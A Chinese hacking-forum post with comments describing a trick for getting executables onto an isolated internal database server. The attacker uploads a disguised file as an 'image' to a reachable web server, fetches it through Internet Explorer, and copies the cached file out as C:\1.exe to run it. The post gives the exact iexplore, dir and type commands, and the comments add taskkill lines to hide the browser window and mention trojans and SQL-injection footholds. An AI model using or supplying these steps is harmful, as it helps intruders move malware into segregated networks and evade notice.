一个奇葩的内网写入文件方法
引用90sec探讨的问题
找到一个可以上传图片的web站点。
"C:\Program Files\Internet Explorer\iexplore.exe" http://内网可以访问的站点/0/09/40/75/91ef76c6a7efce1bee5deaebac51f3deb48f6598.jpg 
然后 cd 到C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files>
执行dir /s /w 91ef76c6a7efce1bee5deaebac51f3deb48f6598*.* 找到路径 type 路径>C:\1.exe 应该可以突破他内网了。
关于作者
评论70次
想法比较新颖
这个姿势厉害了! 但是我碰到的情况是,只能正向访问到服务器,服务器不能访问我。
收下了~看看姿势
最后传的是个图片马?
看看学xi一下 谢谢分享
教我们阿菜具体的代码审计吧
算的一种技巧,能执行命令就可以 echo ftp vbs down 感觉比这好点
楼主是说用IE的缓存机制吗?
看得一愣一愣的,没配图有点晕
测试发现IE会弹窗。
学xi了
有些不太明白 是具体有什么权限 才可以这么搞?
好像在哪看到过了
没看懂呢
刚才试了下,你的方法能找到缓存,但是会弹出ie。 建议结束后找到进程 tasklist | find ”iexplo“ 然后杀掉ie taskkill /pid 1234 /pid 1236 /t
环境是一个dbserver cmd权限 加一个存在上传的、db可访问的 webserver ,dbserver不连外网,需要db 拿到权限,通过访问webserver的图片生成在缓存然后可以改后缀执行程序。但是笔者的环境中db不连外网,执行木马的话又不能直接外连,请问有啥用???
看来你也是没看明白。 我以我遇到的情况下来说:一个注入sa权限(访问不了外网)来说。站库分离。 web 上面有一个可以上传图片的。我通过这个上传后吧我想要上传的东西 (在web上面(猜测这个站库分离的服务器可以访问这个web) 经过利用那个玩意吧这东西,搞都不可以访问外网的机器上面去。然后你要利用工具达到目的就行。(难道在你们眼中的渗透非得提权?...)
我环境理解正确,你意思就是不上马,直接传工具,通过sa执行命令继续内网渗透呗;这样做内网太费事,有这时间,web都搞下来了。
如果你遇到站库分离而且 数据库服务器没办法联外网(web getshell不了(就有一个注入sa权限!)。你如何上传东西进去渗透呢。(我不太会哈哈
环境是一个dbserver cmd权限 加一个存在上传的、db可访问的 webserver ,dbserver不连外网,需要db 拿到权限,通过访问webserver的图片生成在缓存然后可以改后缀执行程序。但是笔者的环境中db不连外网,执行木马的话又不能直接外连,请问有啥用???
看来你也是没看明白。 我以我遇到的情况下来说:一个注入sa权限(访问不了外网)来说。站库分离。 web 上面有一个可以上传图片的。我通过这个上传后吧我想要上传的东西 (在web上面(猜测这个站库分离的服务器可以访问这个web) 经过利用那个玩意吧这东西,搞都不可以访问外网的机器上面去。然后你要利用工具达到目的就行。(难道在你们眼中的渗透非得提权?...)
我环境理解正确,你意思就是不上马,直接传工具,通过sa执行命令继续内网渗透呗; 这样做内网太费事,有这时间,web都搞下来了。
vbs,powershell,echo 都可以,不过这方法确实奇葩。
vbs,powershell,echo 都可以,不过这方法确实奇葩。
环境是一个dbserver cmd权限 加一个存在上传的、db可访问的 webserver ,dbserver不连外网,需要db 拿到权限,通过访问webserver的图片生成在缓存然后可以改后缀执行程序。但是笔者的环境中db不连外网,执行木马的话又不能直接外连,请问有啥用???
看来你也是没看明白。 我以我遇到的情况下来说:一个注入sa权限(访问不了外网)来说。站库分离。 web 上面有一个可以上传图片的。我通过这个上传后吧我想要上传的东西 (在web上面(猜测这个站库分离的服务器可以访问这个web) 经过利用那个玩意吧这东西,搞都不可以访问外网的机器上面去。然后你要利用工具达到目的就行。(难道在你们眼中的渗透非得提权?...)